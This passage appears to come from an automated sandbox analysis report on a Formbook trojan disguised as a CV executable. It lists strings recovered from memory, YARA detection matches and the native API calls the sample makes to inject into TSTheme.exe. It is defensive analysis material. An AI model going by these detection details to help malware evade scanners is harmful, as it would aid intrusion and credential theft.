            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/email?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/privacy?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew/domain/botcsllc.com?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew/domain/kohfour.com?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/renew?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tools?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/tos?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=expired
            Source: TSTheme.exe, 0000000F.00000002.3666682659.0000000008050000.00000004.00000800.00020000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006F4E000.00000004.10000000.00040000.00000000.sdmp, TSTheme.exe, 0000000F.00000002.3664896761.0000000006774000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003534000.00000004.00000001.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003D0E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_land
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_lan
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_land_h
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/?utm_source=www.theppelin.online&utm_medium=parking&utm_campaign=s_land
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/web-sites/website-builder/?utm_source=www.theppelin.online&utm_medium=parking&utm
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006DBC000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003B7C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.theppelin.online&amp;reg_source=parking_auto
            Source: TSTheme.exe, 0000000F.00000002.3664896761.0000000006A98000.00000004.10000000.00040000.00000000.sdmp, OZCzxhvCDDlUqJnCoH.exe, 00000010.00000002.3662941933.0000000003858000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

            E-Banking Fraud

            Source: Yara matchFile source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.3662794432.0000000004B50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1459314243.00000000037F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_0042B353 NtClose,2_2_0042B353
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532B60 NtClose,LdrInitializeThunk,2_2_01532B60
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_01532DF0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01532C70
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015335C0 NtCreateMutant,LdrInitializeThunk,2_2_015335C0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01534340 NtSetContextThread,2_2_01534340
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01534650 NtSuspendThread,2_2_01534650
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532BF0 NtAllocateVirtualMemory,2_2_01532BF0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532BE0 NtQueryValueKey,2_2_01532BE0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532B80 NtQueryInformationFile,2_2_01532B80
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532BA0 NtEnumerateValueKey,2_2_01532BA0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532AD0 NtReadFile,2_2_01532AD0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532AF0 NtWriteFile,2_2_01532AF0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532AB0 NtWaitForSingleObject,2_2_01532AB0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532D10 NtMapViewOfSection,2_2_01532D10
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532D00 NtSetInformationFile,2_2_01532D00
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532D30 NtUnmapViewOfSection,2_2_01532D30
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532DD0 NtDelayExecution,2_2_01532DD0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532DB0 NtEnumerateKey,2_2_01532DB0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532C60 NtCreateKey,2_2_01532C60
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532C00 NtQueryInformationProcess,2_2_01532C00
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532CC0 NtQueryVirtualMemory,2_2_01532CC0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532CF0 NtOpenProcess,2_2_01532CF0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532CA0 NtQueryInformationToken,2_2_01532CA0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532F60 NtCreateProcessEx,2_2_01532F60
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532F30 NtCreateSection,2_2_01532F30
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532FE0 NtCreateFile,2_2_01532FE0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532F90 NtProtectVirtualMemory,2_2_01532F90
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532FB0 NtResumeThread,2_2_01532FB0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532FA0 NtQuerySection,2_2_01532FA0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532E30 NtWriteVirtualMemory,2_2_01532E30
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532EE0 NtQueueApcThread,2_2_01532EE0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532E80 NtReadVirtualMemory,2_2_01532E80
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01532EA0 NtAdjustPrivilegesToken,2_2_01532EA0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01533010 NtOpenDirectoryObject,2_2_01533010
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01533090 NtSetValueKey,2_2_01533090
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_015339B0 NtGetContextThread,2_2_015339B0
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01533D70 NtOpenThread,2_2_01533D70
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exeCode function: 2_2_01533D10 NtOpenProcessToken,2_2_01533D10
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05144650 NtSuspendThread,LdrInitializeThunk,15_2_05144650
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05144340 NtSetContextThread,LdrInitializeThunk,15_2_05144340
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142D10 NtMapViewOfSection,LdrInitializeThunk,15_2_05142D10
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142D30 NtUnmapViewOfSection,LdrInitializeThunk,15_2_05142D30
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142DD0 NtDelayExecution,LdrInitializeThunk,15_2_05142DD0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142DF0 NtQuerySystemInformation,LdrInitializeThunk,15_2_05142DF0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142C70 NtFreeVirtualMemory,LdrInitializeThunk,15_2_05142C70
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142C60 NtCreateKey,LdrInitializeThunk,15_2_05142C60
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142CA0 NtQueryInformationToken,LdrInitializeThunk,15_2_05142CA0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142F30 NtCreateSection,LdrInitializeThunk,15_2_05142F30
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142FB0 NtResumeThread,LdrInitializeThunk,15_2_05142FB0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142FE0 NtCreateFile,LdrInitializeThunk,15_2_05142FE0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142E80 NtReadVirtualMemory,LdrInitializeThunk,15_2_05142E80
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142EE0 NtQueueApcThread,LdrInitializeThunk,15_2_05142EE0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142B60 NtClose,LdrInitializeThunk,15_2_05142B60
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142BA0 NtEnumerateValueKey,LdrInitializeThunk,15_2_05142BA0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142BF0 NtAllocateVirtualMemory,LdrInitializeThunk,15_2_05142BF0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142BE0 NtQueryValueKey,LdrInitializeThunk,15_2_05142BE0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142AD0 NtReadFile,LdrInitializeThunk,15_2_05142AD0
            Source: C:\Windows\SysWOW64\TSTheme.exeCode function: 15_2_05142AF0 NtWriteFile,LdrInitializeThunk,15_2_05142AF0
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_051435C0 NtCreateMutant,LdrInitializeThunk,15_2_051435C0
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_051439B0 NtGetContextThread,LdrInitializeThunk,15_2_051439B0
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05142D00 NtSetInformationFile,15_2_05142D00
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05142DB0 NtEnumerateKey,15_2_05142DB0
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05142C00 NtQueryInformationProcess,15_2_05142C00
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05142CC0 NtQueryVirtualMemory,15_2_05142CC0
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05142CF0 NtOpenProcess,15_2_05142CF0
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05142F60 NtCreateProcessEx,15_2_05142F60
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05142F90 NtProtectVirtualMemory,15_2_05142F90
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05142FA0 NtQuerySection,15_2_05142FA0
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05142E30 NtWriteVirtualMemory,15_2_05142E30
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05142EA0 NtAdjustPrivilegesToken,15_2_05142EA0
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05142B80 NtQueryInformationFile,15_2_05142B80
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05142AB0 NtWaitForSingleObject,15_2_05142AB0
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05143010 NtOpenDirectoryObject,15_2_05143010
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05143090 NtSetValueKey,15_2_05143090
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05143D10 NtOpenProcessToken,15_2_05143D10
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_05143D70 NtOpenThread,15_2_05143D70
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_02FE8020 NtClose,15_2_02FE8020
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_02FE8170 NtAllocateVirtualMemory,15_2_02FE8170
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_02FE7EA0 NtReadFile,15_2_02FE7EA0
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_02FE7F80 NtDeleteFile,15_2_02FE7F80
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: 15_2_02FE7D40 NtCreateFile,15_2_02FE7D40
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: String function: 0518F290 appears 105 times
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: String function: 050FB970 appears 272 times
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: String function: 0517EA12 appears 86 times
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: String function: 05145130 appears 57 times
            Source: C:\Windows\SysWOW64\TSTheme.exe Code function: String function: 05157E54 appears 100 times
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Code function: String function: 0157F290 appears 105 times
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Code function: String function: 014EB970 appears 277 times
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Code function: String function: 01535130 appears 58 times
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Code function: String function: 0156EA12 appears 86 times
            Source: C:\Users\user\Desktop\Curriculum Vitae Catalina Munoz.exe Code function: String function: 01547E54 appears 111 times
            Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000002.1208080989.00000000074E0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000000.1185445435.0000000000AC6000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameWrNb.exeF vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000002.1210757792.0000000008E70000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000002.1202755559.000000000106E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe, 00000000.00000002.1204596679.000000000413A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F18000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTSThemeS.exej% vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457615887.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTSThemeS.exej% vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe, 00000002.00000002.1457839890.00000000015ED000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe Binary or memory string: OriginalFilenameWrNb.exeF vs Curriculum Vitae Catalina Munoz.exe
            Source: Curriculum Vitae Catalina Munoz.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.Curriculum Vitae Catalina Munoz.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1457438353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.3658674267.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.3665046974.00000000048F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.3662944861.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000F.00000002.3657466018.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1459154555.0000000001850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
